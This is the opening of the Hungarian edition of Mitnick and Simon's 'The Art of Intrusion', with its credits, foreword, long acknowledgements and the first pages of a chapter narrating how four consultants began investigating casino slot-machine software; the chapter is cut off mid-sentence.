You are on page 1of 311

KEVIN D.

MITNICK
WILLIAM L. SIMON

A legendás hacker – A behatolás


művészete
(Tartalom)
2006 Perfact-Pro Kft
Minden jog fentartva!
ISBN 9789638647252
A könyv eredeti címe:
The Art of Intrusion – The Real Stories
Behind the Exploits of Hackers. Intruders & deceivts
Copyright 2005 Kevin D. Mitnick and Williarn L. Simon
Published by Wiley Rublishing. INC.
This translation published under license.
All rights reserved.
Felelősség korlátozása szavatosság elhárítása.
A kiadó és a szerző semmilyen felelősséget és szavatosságot nem
vállal jelen könyv tartalmának pontosságára vagy teljességére
vonatkozóan. A könyvben leírt tanácsok és stratégiák nem biztos hogy
minden helyzetben megfelelőek. Jelen anyag annak megértésével kerül
eladásra, hogy a kiadó nem vállalkozik jogi, számviteli vagy egyéb
szakmai szolgáltatások nyújtására. Ha szakmai segítségre van szükség,
megfelelő szakember szolgáltatásait kell igénybe venni. Sem a kiadó,
sem a szerző nem vonható felelőségre az ebből eredő károkért. A
puszta tény hogy jelen munkában idézetként és vagy lehetséges további
információforrásként hivatkozunk egy szervezetre vagy egy
weboldalra, nem jelenti azt, hogy a szerző vagy a kiadó egyetért a
szervezet vagy weboldal által közölt információval vagy ajánlott
tanácssal. Az olvasóknak ezen túlmenően tisztában kell lenni azzal,
hogy jelen műben felsorolt weboldalak megváltozhattak vagy
eltűnhettek a jelen mű írása és olvasása között eltelt időben.
Védjegyek: A Wiley és a Wiley logó a John Wiley & Sons. Inc. és
vagy leányvállalatai védjegye az Egyesült Államokban és más
országokban, írásbeli engedély nélkül nem használhatók. Minden más
védjegy a tulajdonosaik tulajdona. A Wiley Publishing. Inc. nem áll
kapcsolatban a könyvben említeti egyetlen termékkel vagy gyártóval
sem.
A szerző és a kiadó a tőle elvárható legnagyobb gondossággal járt
el a könyv készítése során. A könyvben található esetleges hibákért,
sem a szerző, sem a kiadó nem vállal semminemű felelőséget.
Fordította: Lénárt Szabolcs
Nyelvileg lektorálta: Kulcsár Zsuzsanna
Szakmailag ellenőrizte: Körösztós Gábor
Tördelte: Virág László
Felelős kiadó a PerfacT-Pro Ktf. ügyvezető igazgatója
Tlel Fax: (06-1) 260-0990
http: kiado.perfact.hu
Készült A Borsodi Nyomda Kft.-ben
Felelős vezető; Ducsai György ügyvezető igazgató
Shelly Jaffe-nek, Reaba Vartaniannek, Chickie Leventhalnak és
Mitchell Mitnicknek
Darcinak és Briannahnek
a néhai Alan Mitnicknek, Adam Mitnicknek Sydney Kramernek és
Jack Biellónak
Arynne-nek, Victoriának Sheldonnak, és Davidnek, Vincentnek és
Elenának

A könyv szerzőiről

KEVIN D. MITNICK ünnepelt hacker, aki „jó útra tért” és


egyedülálló ismereteivel az üzleti élet szereplőit, az intézményeket és a
kormányzati szerveket segíti az ebben a könyvben, illetve a (szintén a
Perfact-Pro Kft által kiadott) korábbi, A megtévesztés művészete című
sikerkönyvében bemutatott támadások elleni védelemben. A Defensive
Thinking (defensivethinking.com) nevű információbiztonsági
tanácsadó cég társalapítója, amelynek küldetése cégek és kormányzati
szervek fontos információinak védelme érdekében nyújtott tanácsadás.
Szerepelt a Good Morning America, 60 Minutes és a CNN Burden of
Proof című műsorában, és komoly hírnevet szerzett a biztonsági
támadások és a kiberbűnözés elleni harc hiteles vezéreként.
WILLIAM L. SIMON díjnyertes szerző és szövegkönyvíró, aki A
megtévesztés művészete című könyv írása során is együttdolgozott
Kevin Mitnickkel.
„Ismerje meg karosszéke kényelméből a számítógépes bűnözők
ellenséges világát. Mitnick tíz ellenállhatatlan fejezetet közöl, amelyek
mindegyike egy létezőhacker valóságos támadásáról folytatott
beszélgetés eredménye. Kihagyhatatlan mindazok számára, akiket
érdekel az információbiztonság.”
Tom Parker, számítógép-biztonsági elemző, a Global InterSec LLC
alapítója
„Arra ösztökél, hogy átérezzük az ezen illegális támadásokhoz
szükséges rendkívüli éleselméjűséget. Képzeljük el, mi mineden
származhatna abból, ha ezek a lángelmék jó célra használnák fel
tudásukat. Akár szórakoztatás, akár oktatás céljából, csak ajánlani
tudom a könyvet.”
About.com

Dicsérő szavak A megtévesztés művészete című könyvről

„Végre mer valaki az adatbiztonsági támadások igazi okáról is


beszélni – a buta emberekről... Mitnick... a 'social engineering' szakma
okos trükkjeit tárja fel, és azt is megmutatja, hogyan hárítsuk el
azokat.”
Stephen Manes, Forbes
„Bűvészmutatvány, mesék sorozat arról, hogyan csalható ki bárkitől
bármilyen információ régimódi hízelgéssel és egy kevés high-tech
tudással. Szórakozásnak olyan, mintha tucatnyi briliáns krimi utolsó
fejezetét olvasnánk, egyiket a másik után.”
Publishers Weekly

Előszó
A hackerek egymás között játszanak. Az egyik díj az, hogy
elhenceghetnek a biztonsági cégem weboldalának vagy saját személyes
rendszerem feltörésével.
Az egyik feladat pedig talán az volt, hogy kitaláltak egy
hackertörténetet, amit olyan meggyőzően mondtak el nekem és
társszerzőmnek, Bili Simonnak, hogy mi bevettük, igaznak hittük, és
megírtuk ebben a könyvben.
Lenyűgöző kihívás volt, egy olyan agyjáték, amit mi ketten
folyamatosan játszottunk a könyvhöz készített interjúk során. A
legtöbb riporter és író számára a hitelesség ellenőrzése egyszerű
rutinfeladat: Ő tényleg az a személy, akinek mondja magát? Tényleg
annak a szervezetnek dolgozik vagy dolgozott, amiről ezt állítja?
Tényleg az a beosztása, amit mondott nekünk? Van bármilyen
dokumentum, amivel alá tudja támasztani a történetet, és hogyan
ellenőrizhetem a dokumentumok hitelességét? Szavahihetőek az
emberek, akik a történetet vagy legalábbis annak egy részét tanúsítják?
Hackerek esetében nehézkes a jóhiszeműség ellenőrzése. A
könyvben a történetükkel szereplő emberek nagy része – talán csak a
börtönt már megjárt hackerek kivételével – komoly vádakkal
szembesülne, ha valódi személyazonosságuk kiderülne. A valódi
nevükre rákérdezni, vagy arra számítani, hogy bizonyítékként
megmondják azt, igencsak bizonytalan kimenetelű játék.
Ezek az emberek csak azért álltak elő a történetükkel, mert bíznak
bennem. Tudják, hogy magam is ültem börtönben, és hajlandók bízni
bennem, hogy nem fogom oly módon elárulni őket, hogy hasonló
helyzetbe jussanak. A kockázatok ellenére többen közülük
kézzelfogható bizonyítékokkal szolgáltak a hackjeikre.
Ennek ellenére lehetséges, sőt valószínű, hogy közülük egyesek
eltúlozták a történetük egyes részleteit annak érdekében, hogy még
lenyűgözőbbé tegyék, vagy netán az egész történetet csupán kitalálták,
hiszen korábbi kalandjaik során már elég tapasztalatot gyűjtöttek
ahhoz, hogy a sztori hihetőnek tűnjön.
Pontosan e kockázat miatt mindent elkövettünk, hogy
szavahihetőségükről meggyőződhessünk. Az interjúk során minden
egyes technikai részletre alaposan rákérdeztem, részletes magyarázatot
kértem minden olyan esetben, amikor valami nem tűnt meggyőzőnek,
esetenként újból elmeséltettem a történetet, kíváncsi lévén arra, hogy
másodszor is ugyanúgy mesélik-e el. Kérdeztem, ha a mesélő „nem
emlékezett” valamire a történetből és akkor is, ha látszólag nem tudott
eleget ahhoz, amit állítólag véghez vitt, vagy nem volt képes
elmagyarázni, hogyan jutott A pontból B-be.
Ahol ezt nem jeleztük másképpen, a könyvben szereplő minden nagy
történet átment a „vizsgámon”. Társszerzőmmel egyetértettünk a
könyvben szereplő minden egyes személy szavahihetőségében.
Mindazonáltal a hacker és az áldozat érdekében bizonyos részleteket
megváltoztattunk. Egyes történetekben módosítottuk a bennük szereplő
cégek személyazonosságát. A célba vett szervezetek nevét,
tevékenységét és fizikai elhelyezkedését meg változtattuk. Egyes
esetekben félrevezető információt közöltünk az áldozat
személyazonosságának védelmében, illetve a bűntény megismétlésének
elkerülése érdekében. Ennek ellenére az incidensek természete és
maguk a sebezhetőségek igaziak maradtak.
Mivel azonban a szoftverfejlesztők és a hardvergyártók biztonsági
javítások és új termékváltozatok segítségével folyamatosan javítják ki a
biztonsági sebezhetőségeket, az ezen az oldalakon leírt támadásoknak
csupán kis része működik az itt bemutatott módon. Ez azt sugallhatja a
túlzottan magabiztos olvasónak, hogy semmivel nem kell foglalkoznia,
az észrevett és kijavított sebezhetőségeknek köszönhetően sem neki,
sem a cégének nincs mitől tartania. A történetek tanulsága azonban
pontosan az, hogy akármi történt is hat hónapja vagy hat éve, a
hackerek mindennap új sebezhetőségeket fognak találni. Ne azért
olvassa el a könyvet, hogy adott termékek adott sebezhetőségéről
tudomást szerezzen, hanem azért, hogy megváltozzon a hozzáállása, és
új szemlélet alakulhasson ki Önben.
És azért is olvassa el a könyvet, hogy szórakozzon, megdöbbenjen,
le legyen nyűgözve e rettenetesen okos hackerek állandóan meglepő
tetteitől.
Olvashat megdöbbentő, történeteket, amelyek felnyitják a szemét, és
olyanokat is, amelyekben nevetésre készteti a hacker megszállottsága.
Ha Ön informatikus vagy biztonsági szakértő, minden egyes történet
segíteni fog abban, hogy szervezetét biztonságosabbá tegye. Ha nem
műszaki beállítottságú, hanem olyasvalaki, aki szeret bűnügyi,
kockázatvállalásról vagy egyszerűen csak vakmerőségről szóló
történetek olvasni, akkor jó helyen jár.
Mindegyik kalandban benne volt a lehetőség, hogy bármikor
kopoghatnak az ajtón, és ott rendőrök, FBI ügynökök vagy a
titkosszolgálat emberei várnak kezükben a bilinccsel. És egyes
esetekben pontosan ez történt.
Ez a kockázat a többi szereplő számára is fennáll. Nem csoda, hogy
e hackerek többsége még soha beszélni sem volt hajlandó a
történetéről. Az itt olvasható kalandok többsége első alkalommal
jelenik meg.

Köszönetnyilvánítás
Kevin Mitnicktől

A könyvet ajánlom csodálatos családomnak, közeli barátaimnak és


legfőképpen a megjelenését lehetővé tevő embereknek – a fekete és
fehér kalapos hackereknek, akik okulásunkra és szórakozásunkra
megosztották velünk történetüket.
A behatolás művészetét nagyobb kihívás volt megírni, mint az előző
könyvünket. Ahelyett, hogy kreatív tehetségünket közösen használva
kitalált történetekkel és anekdotákkal szemléltettük volna a social
engineering veszélyeit, illetve azt, hogy mit tehetnek a cégek ezen
veszélyek elkerülése érdekében, Bili Simonnal arra építettünk a könyv
megírása során, hogy korábbi hackereket, telefonphreakeket és
hackerből lett biztonsági szakembereket interjúvoljunk meg. Olyan
könyvet akartunk írni, amely egyszerre izgalmas krimi és oktatókönyv
az értékes információikat és számítógépes erőforrásaikat védő cégek
számára. Komolyan hiszünk abban, hogy a hackerek által a rendszerek
és hálózatok feltöréséhez használt gyakori módszerek és technikák
ismertetésével képesek vagyunk befolyásolni a közösséget, hogy
megfelelően felkészüljenek a csavaros eszű ellenségeink által jelentett
kockázatokra és fenyegetésekre.
Abban a különleges szerencsében volt részem, hogy Bili Simon
sikerszerzővel dolgozhattam együtt, és sikerült az új könyv megírása
során is szorgalmasan együttműködnünk. Bili írói képességei közé
tartozik az a varázslatos tudás, ahogy az interjúalanyainktól szerzett
információt olyan stílusban és módon írja meg, hogy azt még a
nagymamám is megértené. Ennél is fontosabb, hogy az írás során Bili
nem csak a munkatársam volt, hanem hű barátom is, aki a munka során
mindig rendelkezésemre állt. Noha az anyaggyűjtés során voltak
közöttünk nehéz pillanatok és véleménykülönbségek, mindig sikerült
mindkettőnk megelégedésére lezárnunk őket. Kevesebb, mint két éven
belül, amikor bizonyos rám vonatkozó ügyészségi korlátozások
lejárnak, végre megírhatom és kiadhatom Kevin Mitnick el nem
mondott történetét. Remélem, Biliel ezen a feladaton is
együttdolgozhatunk majd.
Bili csodálatos feleségét, Arynne Simont szívem kedves zugában
őrzöm. Nagyra értékelem az elmúlt három évben felé nyújtott
szeretetét, kedvességét és nagylelkűségét. Egyetlen elszomorító
élményem, hogy nem élvezhettem a nagyszerű főztjét. Most, hogy
végre elkészült a könyv, talán meg tudom győzni, hogy készítsen egy
ünnepi vacsorát!
Mivel annyira A behatolás művészetére összpontosítottam, nem sok
időt tölthettem a családommal és a közeli barátaimmal. Némiképpen
workaholic lettem, hasonlóan azokhoz a napokhoz, amikor számtalan
órát töltöttem a billentyűzet mögött a kibertér sötét sarkainak
felderítésével.
Szeretnék köszönetét mondani szerető barátnőmnek, Darci
Woodnak, és játszani imádó lányának, Briannah-nak, amiért
támogattak és türelmesek voltak ez alatt az időigényes projekt alatt.
Köszönet bébi mindazért a szeretetért és támogatásért, amit te és
Briannah nyújtottatok nekem, miközben ezen és egyéb kihívásokkal
teli projekteken dolgoztam.
Ez a könyv nem jöhetett volna létre családom szeretete és
támogatása nélkül. Édesanyám, Shelly Jaffe, és nagymamám, Reba
Vartanian feltétlen szeretetükről és támogatásukról biztosítanak egész
életemben. Nagyon szerencsés vagyok, hogy ilyen szerető és
elkötelezett anya nevelt fel, akit a legjobb barátomnak tartok.
Nagymamám olyan volt nekem, mint egy második anya, úgy nevelt és
szeretett, amire normális esetben csak egy anya képes. Rendkívül
segítőkész volt bizonyos üzleti ügyeim kezelésében, ami esetenként a
napi időbeosztásába ütköztek. Minden esetben az én üzleti dolgaimat
tette elsődlegessé, még akkor is, ha ez számára kényelmetlenséggel
járt. Köszönöm Nagyi, hogy amikor csak szükségem volt rád, segítettél
a munkámban. Gondoskodó és jószívű emberként megtanították nekem
a másokkal való törődés és a rászorulók segítésének fontosságát. És az
adni és törődni mintáját utánozva bizonyos értelemben az ő életük
ösvényeit követem. Remélem, meg fogják nekem bocsátani, hogy
takaréklángra állítottam őket a könyv írása közben, munkára, illetve
betartandó határidőkre hivatkozva kihagytam a velük történő találkozás
lehetőségeit. Ez a könyv nem jöhetett volna létre folyamatos szeretetük
és támogatásuk nélkül, amiért én örökre hálás leszek nekik.
Bárcsak Édesapám, Alan Mitnick, és a bátyám, Adam Mitnick elég
sokáig éltek volna ahhoz, hogy egy üveg pezsgő felbontásával
ünnepeljük meg a napot, amikor a második könyvünk megjelenik a
könyvesboltokban. Értékesítőként és üzletemberként apám sok olyan
finomságra tanított meg, amit soha nem fogok elfelejteni.
Édesanyám néhai élettársa, Steven Knittle olyan volt számomra az
elmúlt 12 évben, mint egy apa. Nagy megnyugvással töltött el, hogy
mindig ott voltál és gondoskodtál édesanyámról, amikor én nem
tudtam. Halálod szomorúsággal töltötte el a családunkat, hiányzik a
humorérzéked, a nevetésed és a szeretet, amit a családunkba hoztál.
Nyugodj békében.
Nagynéném, Chickie Leventhal különleges helyet tölt be a
szívemben. Az elmúlt néhány évben családi kötelékeink szorosabbak
lettek, beszélgetéseink mindig élményszámba mennek. Bármikor
tanácsra van szükségem, vagy egy helyre, ahol meghúzhatom magam,
mindig felkínálja szeretetét és támogatását. Miközben oly intenzíven a
munkának szenteltem magam, számtalanszor elmulasztottam annak
lehetőségét, hogy családi összejöveteleinken találkozzak vele,
unokatestvéremmel, Mitch Leventhallal, és barátjával, Dr. Roben
Berkowitzcal.
Jack Biello barátom kedves és figyelmes ember volt, aki felemelte
szavát a különösen rossz bánásmód ellen, amit az újságíróktól és az
államügyészektől kaptam. Kulcsszereplő volt a Free Kevin
(Szabadítsátok ki Kevint) mozgalomban; egy olyan író, akinek
különleges tehetsége volt olyan ellenállhatatlan cikkek megírásában,
amely a kormányzat által az emberek elől eltitkolni vágyott
információkat tárta fel. Jack mindig ott volt, hogy félelem nélkül
beszéljen a nevemben, beszédek és cikkek elkészítésében együtt
dolgozzunk, sőt egyszer még médiakapcsolatként is képviselt engem.
Éppen A megtévesztés művészete (Perfact-Pro Kiadó, 2003) című
könyv kéziratán dolgoztunk, amikor elment, halála nagy veszteség és
szomorúság érzését keltette bennem. Noha ez már két éve történt, Jack
mindig a gondolataimban van.
Egyik legközelebbi barátom, Caroline Bergeron mindvégig
támogatta a könyv elkészítése érdekében tett erőfeszítéseimet. Kedves
és okos lány aki nemsokára ügyvéd lesz, és Great White North-ban
lakik. Victoriában találkoztunk az egyik előadásomon, és azonnal
remekül megértettük egymást. Korrektúrázásával, szerkesztésével és
javításaival nagy segítségemre volt az Alex Kasperrel közösen
képnapos social engineering szemináriumon. Köszönöm, Caroline,
hogy ott voltál velem.
Kollégám, Alex Kasper nem csupán a legjobb barátom, hanem a
munkatársam is; jelenleg olyan egy napos és kétnapos
szemináriumokat tartunk, amelyen az üzleti szereplők megtanulhatják,
hogyan ismerjék fel és védekezzenek a social engineering támadások
ellen. Közösen vezettünk egy népszerű beszélgető műsort „Az Internet
árnyoldala” címen a Los Angeles-i KF1 rádióban. Remek és bizalmas
barát vagy. Köszönöm a felbecsülhetetlen értékű segítségedet és
tanácsaidat. Mindig pozitív hatással voltál rám, annyi kedvességgel és
nagylelkűséggel, ami gyakran messze meghaladta a szokásos mértéket.
Paul Dryman már sok-sok éve családi jó barátunk. Paul volt néhai
édesapám legjobb barátja. Miután apám meghalt, Paul olyan volt
nekem, mint egy apa, aki mindig hajlandó segíteni és beszélgetni az
engem foglalkoztató dolgokról. Köszönöm, Paul, a hűséges és
áldozatos barátságot, amit édesapám iránt és irántam oly sok éve
tanúsítasz.
Az elmúlt három évben Amy Gray menedzselte előadói karrieremet.
Nem egyszerűen csak csodálom és imádom a személyiségét, hanem
nagyra értékelem, amilyen tisztelettel és udvariassággal kezeli a többi
embert. A professzionalizmus iránti elhivatottságod és
elkötelezettséged nagyban hozzájárult az előadóként és oktatóként elért
sikeremhez. Köszönet az el nem múló barátságodért és a kiválóság
iránti elkötelezettségedért.
Gregory Vinson ügyvéd a védőcsapatom tagja volt a kormányzattal
vívott több éves harcom során. Biztos vagyok abban, hogy Bilihez
hasonlóan megérti és türelmesen viseli a tökéletesség iránti
elkötelezettségemet; ugyanolyan munkatapasztalatokat szerzett
mellettem a nevemben megírt jogi összefoglaló anyagok elkészítése
során. Gregory most az üzleti ügyvédem, aki lelkiismeretesen dolgozik
az új szerződéseken és üzleti tárgyalásainkon. Köszönöm a csodálatos
segítségedet és szorgalmas munkádat, különösen ha rövid határidőre
kell elkészülnöd vele.
Eric Corley (más néven Emmanuel Goldstein) több mint egy
évtizede aktív támogatóm és közeli barátom. Mindig a legjobb
érdekeimet képviselte, és nyilvánosan védett meg, amikor a Miramax
Films és egyes más újságírók kígyót-békát kiabáltak rám. Eric
rendkívül hatásosan lépett fel a kormányzat velem szembeni eljárása
ellen. Kedvességed, nagylelkűséged és barátságod többet jelent annál,
mint amit szavakkal el lehet mondani. Köszönöm, hogy hű és
megbízható barátom vagy.
Steve Wozniak és Sharon Akers idejük nagy részét azzal töltik, hogy
engem támogassanak, és mindig ott vannak, hogy kisegítsenek. Nagyra
értékelem, hogy gyakran felborítjátok a napi programjaitokat azért,
hogy ott legyetek segíteni nekem. Most, hogy elkészült a könyv,
remélhetőleg több időnk lesz egymásra. Steve, soha nem fogom
elfelejteni, amikor te, Jeff Samuels és jómagam egész éjszaka utaztunk
a Hummereddel a Los Angeles-ben rendezett DefCon konferenciára,
állandóan váltogatva egymást a kormánynál, hogy a vezeték nélküli
GPRS kapcsolatunkon keresztül elolvashassuk e-mailjeinket és
chatelhessünk a barátainkkal.
Miközben írom ezeket a köszönetnyilvánításokat, rájövök, mennyi
embernek kell köszönetét mondanom és nagyrabecsülésemet
kifejeznem szeretetükért, barátságukért és támogatásukért. Sajnos már
nem emlékezem az összes kedves és nagylelkű ember nevére, akikkel
az elmúlt években találkoztam, de nem túlzás azt mondani, hogy nagy
USB flash drive-ra lenne szükség ahhoz, hogy mindent eltároljak. A
világ minden részéről annyi ember írt nekem bátorító, dicsérő és
támogató szavakat. Nagyon sokat jelentettek nekem ezek a szavak,
különösen a legnehezebb időkben.
Különösen hálás vagyok mindazon támogatóimnak, akik mellettem
álltak, és értékes idejüket és energiájukat arra fordították, hogy
hallassák szavukat a velem szembeni tisztességtelen bánásmód, illetve
túlzások ellen, amit a „Kevin Mitnick mítosz”-ból profitot remélők
teremtettek.
Sietek köszönetét mondani azoknak, akik professzionális karrieremet
képviselik, és rendkívül elkötelezettek irányomban. David Fugate a
Waterside Productions-nél a könyvügynököm, aki annyiszor közbenjárt
értem a jelen könyvre szóló szerződés megkötése előtt és után is.
Nagyra értékelem a lehetőséget, amit a John Wiley & Sons kiadó
biztosított számomra a második könyvvel, és köszönöm, hogy hittek
abban, hogy sikerkönyvet tudunk írni. Szeretnék köszönetét mondani a
Wiley-nál dolgozóknak, akik lehetővé tették ezt az álmot: Ellen
Gersteinnak; Bob Ipsennek; Carol Longnak, aki mindig azonnal
válaszol kérdéseimre és aggodalmaimra (első számú kapcsolattartóm és
vezető szerkesztő a Wiley-nál); és Emilie Herman-nek és Kevin
Shafernek (szerkesztők), akik mindketten nagyszerű csapatmunkát
végeztek annak érdekében, hogy elkészüljünk.
Túl sok tapasztalatom van már az ügyvédekkel, de nagy örömmel
fejezem ki köszönetemet azoknak az ügyvédeknek, akik a bűnügyi
igazságszolgáltatással való kellemetlen érintkezéseim éveiben
bukkantak fel és ajánlották fel segítségüket akkor, amikor arra égető
szükségem volt. A kedves szavaktól az ügyemben történő alapos
elmélyülésig sok olyannal találkoztam, akikre egyáltalán nem illik az
önző és egoista ügyvéd sztereotípiája. Tisztelem, csodálom és
értékelem a sokuk által teljesen önzetlenül felém nyújtott kedvességet
és nagylelkűséget. Mindannyian megérdemlik, hogy egy bekezdés
erejéig kedvesen szavakkal ismerjem el őket; a legkevesebb, amit
megtehetek, hogy név szerint megemlítem őket, mivel mindegyikükre
szeretettel gondolok: Greg Aclin, Fran Campbell. Lauren Colby, John
Dusenbury, Sherman Ellison, Omar Figueroa, Jim French, Carolyn
Hagin, Rob Halé. David Mahler. Ralph Peretz, Alvin Michaelson,
Donald C. Randolph, Alán Rubin, Tony Serra, Skip Slates, Richard
Steingard. Honorable Robert Talcott, Barry Tarlow, John Yzurdiaga és
Gregory Vinson.
További családtagok, személyes barátok, üzleti ismerősök, akik
tanáccsal és támogatásukkal sokféleképpen segítettek, és megérdemlik,
hogy megemlékezzek róluk és köszönetét mondjak nekik: JJ Abrams,
Sharon Akers, Matt „NullLink” Beckman, Alex „CriticalMass” Berta,
Jack Biello, Serge és Susanne Birbrair, Paul Block, Jeff Bowler, Matt
„404” Burke, Mark Burnett, Thomas Cannon, GraceAnn and Perry
Chavez, Raoul Chiesa, Dalé Goddington, Marcus Colombano, Avi
Corfas, Ed Cummings, Jason „Cypher” Satterfield, Robert Davies,
Dave Delancey, Reverend Digital, Oyind Dossland, Sam Downing,
John Draper, Ralph Echemendia, Ori Eisen, Roy Eskapa, Alex
Fielding, Erin Finn, Gary Fish és a Fishnet Security, Lisa Flores, Brock
Frank, Gregor Freund, Sean Gailey és az egész Jinx csapat, Michael és
Katie Gardner, Steve Gibson, Rop Gonggrijp, Jerry Greenblatt,
Thomas Greene, Greg Grunberg, Dave Harrison, G. Mark Hardy, Larry
Hawley, Leslie Herman, Michael Hess és mindenki a Roadwired
táskáknál, Jim Hill, Ken Holden Rochell Hornbuckle, Andrew
„Bunnie” Huang, Linda Hull, Steve Hunt, az összes remek ember az
IDC-nél, Marco Ivaldi, Virgil Kasper, Stacey Kirkland, Erikjan
Koedijk, a Lamo Family, Leo és Jennifer Laporte, Pat Lawson, Candi
Layman, Arnaud Le-hung, Karen Leventhal, Bob Levy, David és Mark
Litchfield, CJ Little, Jonathan Littman, Mark Loveless, Lucky 225,
Mark Maifrett, Lee Malis, Andy Marton, Lapo Masiero, Forrest
McDonald, Kerry McElwee, Jim „GonZo” McAnally.
Paul és Vicki Miller, Elliott Moore, Michael Morris, Vincent, Paul és
Hileen Navarino, Patrick és Sarah Norton, John Nunes, Shawn Nunley,
janis Orsino, Tóm Parker, Marco Plas, Kevin és Lauren Poulsen, Scott
Press, Linda és Art Pryor, PyrO, John Rafuse, Mike Roadancer és a
HOPE 2004 teljes biztonsági személyzete, RGB, Israel és Rachel
Rosencrantz, Mark Ross, Bili Royle, William Royer, Joel „chOlOman”
Ruiz, Martin Ruks, Ryan Russell, Brad Sagarin, Manin Sargent,
Loriann Siminas, Te Smith, Dan Sokol, IVudy Spector, Matt Spergel,
Gregoiy Spievack, Jim és Olivia Sumner, Douglas Thomas, Cathy Von,
Ron Wetzel, Andrew Williams, Willem, Don David Wilson, Joey
Wilson, Dave and és Wykofka, és minden barátom és támogatóm a
Labmistress.com és a 2600 Magazin szerkesztőségében.

Bili Simontól
Miközben első könyvünkön, A megtévesztés művészetén
dolgoztunk, Kevin Mitnick és közöttem barátság szövődött. Mialatt ezt
a könyvet írtuk, folyamatosan a közös munka új útjaira leltünk, és
közben tovább mélyítettük barátságunkat, így első méltató szavaim
Kevinnek járnak, aki kiváló „útitárs” volt ezen a második közös úton.
David Fugate, a Waterside Productions-nél dolgozó ügynököm, aki
az első számú felelős azért, hogy Kevinnel összetalálkoztunk, bevetette
a szokásos türelem– és bölcsességtárát, hogy megtaláljuk a néhány
időközben felmerülő kellemetlen helyzet megoldását. Amikor a dolgok
bekeményednek, minden író egy ilyen ügynökkel kellene hogy meg
legyen áldva, aki olyan bölcs és jó, mint egy barát. Hasonló méltatás
jár régi-régi barátomnak. Bili Gladstone-nak, aki a Waterside
Productions alapítója és vezető ügynököm. Bili mindig kulcsszerepet
fog játszani írói karrierem sikerében, és soha el nem múló hálám az
övé.
Feleségem, Aryenne szeretetével és a tökéletesség iránti
elkötelezettségével minden nap újból és újból ösztönöz: többre
becsülöm őt annál hogy mindezt szavakba tudjam önteni.
Intelligenciájával és őszinte kritikájával mélyítette írói jártasságomat,
amikor egyenesen a szemembe mondta, ha írásommal melléfogtam.
Valahogy mindig kibírja a javaslataira első reakcióként érkező
dühkitöréseimet, és a végén mindig belátom javaslatainak bölcsességét,
és átdolgozom a kérdéses részt.
Mark Wilson egyedülálló segítséget nyújtott nekem. Emilie Herman
a szerkesztők bajnoka. Nem feledkezhetem meg Kevin Shafer
munkájáról sem, aki az után vette át a dolgokat, hogy Emilie elment.
Még a tizenhatodik könyv írása során is adósságokat halmozok fel
azokkal szemben, akik nagyon segítőkészek voltak; a sok közül
különösen szeretném megemlíteni Kimberly Valentinit és Maureen
Maloney-t a Waterside-tól, illetve Josephine Rodriguezt. Marianne
Stuber szokás szerint nagyon gyors munkát végzett az átírással (ami a
különös műszaki kifejezések és a hackerszleng miatt egyáltalán nem
volt könnyű feladat), Jessica Dudgeon pedig működésben tartotta az
irodát. Darci Wood remekül viselte, hogy Kevinje mennyi időt szánt a
könyv elkészítésére.
Külön köszönet Victoria lányomnak és Sheldon fiamnak a
megértésükért, és ikerunokáimnak, Vincentnek és Hiénának, akiket
remélem, többet láthatok a kézirat leadása után.
Azoknak, akik felajánlották a történeteiket, és különösen azoknak,
akiknek a lenyűgöző történeteket kiválasztottuk, Kevin és jómagam
örökké hálásak leszünk. Komoly kockázatok vállalásával álltak
rendelkezésünkre. Ha nevüket elárultuk volna, sok esetben azonnal
elvitték volna őket az egyenruhások. Azok is, akiknek a történetét nem
használtuk fel, bátorságról tettek tanúbizonyságot, és megérdemlik,
hogy csodáljuk őket. És őszintén csodáljuk is ezeket az embereket.

1. fejezet

Kaszinók hackelése egymillió dolcsiért


Mindig, amikor [egy programozó] azt gondolja, hogy „senki nem
veszi ezért a fáradtságot”, lesz Finnországban egy srác, aki majd
igenis veszi.
Alex Mayfield
Minden szerencsejátékos számára van egy varázslatos pillanat,
amikor az egyszerű izgalom háromdimenziós fantáziává dagad – egy
pillanat, amikor a mohóság ledönti az erkölcsi korlátokat, és a kaszinó
rendszere csak egy újabb meghódítandó hegycsúcs. Ebben a
pillanatban az asztalok vagy gépek biztos legyőzésének ötlete nem
egyszerűen megragadja az embert, hanem még a lélegzetét is elállítja.
Alex Mayfield és három barátja nem csak ábrándoztak. Sok más
hackeléshez hasonlóan ez is csak szellemi tornaként indult, hogy
lássák, vajon lehetséges-e. Végül négyüknek sikerült legyőzni a
rendszert, vagy ahogy Alex mondja, „körülbelül egy millió dollárra
levenni a kaszinókat”.
Az 1990-es évek elején mind a négyen tanácsadóként dolgoztak a
high-tech iparágban, és lazára vették az életet. – Tudod, hogy van,
dolgozol egy kicsit, keresel egy kis pénzt, majd semmit sem csinálsz
addig, amíg újból le nem égsz.
Las Vegas messze volt – a srácok számára filmek és tv-
showműsorok helyszíne volt csupán, így amikor egy technológiai
vállalat szoftverfejlesztési megbízást kínált nekik, majd felajánlotta,
hogy elmehetnek egy ott rendezendő high-tech konferenciára, örömmel
éltek a lehetőséggel. Egyikük sem volt még Vegasban, itt a lehetőség,
hogy meglássák a villogó fényeket, ráadásul minden költséget fizetnek
nekik; vajon ki utasítaná ezt vissza? Az egyik előkelő szállodában rájuk
váró különálló szobák azt jelentették, hogy Alex felesége és Mike
barátnője is részese lehet a bulinak. A két pár, illetve Larry és Marco
útnak indultak a Bűn Városába.
Alex elmesélte, hogy szinte semmit nem tudtak a szerencsejátékról,
így azt sem tudták, hogy mire számítsanak. – Leszállsz a gépről, és azt
látod, ahogy az öreglányok a nyerőautomatákkal játszanak. Egyszerre
mókás és ironikus, teljesen bele tudsz feledkezni.
Miután letudták a konferenciát, a két lánnyal együtt a szállodájuk
kaszinójában üldögéltek, a nyerőautomatákkal játszottak és az ingyen
sört kortyolgatták, amikor Alex felesége felkeltette az érdeklődésüket:
Ezek a gépek nem számítógépekre épülnek? Fiúk, ti számítógépekben
utaztok, nem tudnátok tenni valamit azért, hogy többet nyerjünk?
A srácok Mike szobájában gyűltek össze, repkedtek a kérdések és az
elméletek arról, hogyan is működhetnek ezek a gépek.

Kutatás

Ezzel mintegy meghúzták a ravaszt. – Kíváncsiak lettünk, és amikor


hazaértünk, elkezdtünk utánajárni a dolognak – meséli Alex,
felelevenítve a kreatív szakasz élénk emlékeit. Rövid utánajárás után
bebizonyosodott, amit már gyanítottak. – Igen, alapjában véve ezek
számítógépes programok, így érdekelni kezdett, van-e valamilyen mód
arra, hogy feltörjük ezeket a gépeket?
Volt már, aki a firmware-t (a mikroprogramot) kicserélve legyőzte a
nyerőautomatákat – a gépben levő chiphez hozzáférve – és annak
programozását módosítva a kaszinó által szándékoltnál vonzóbb
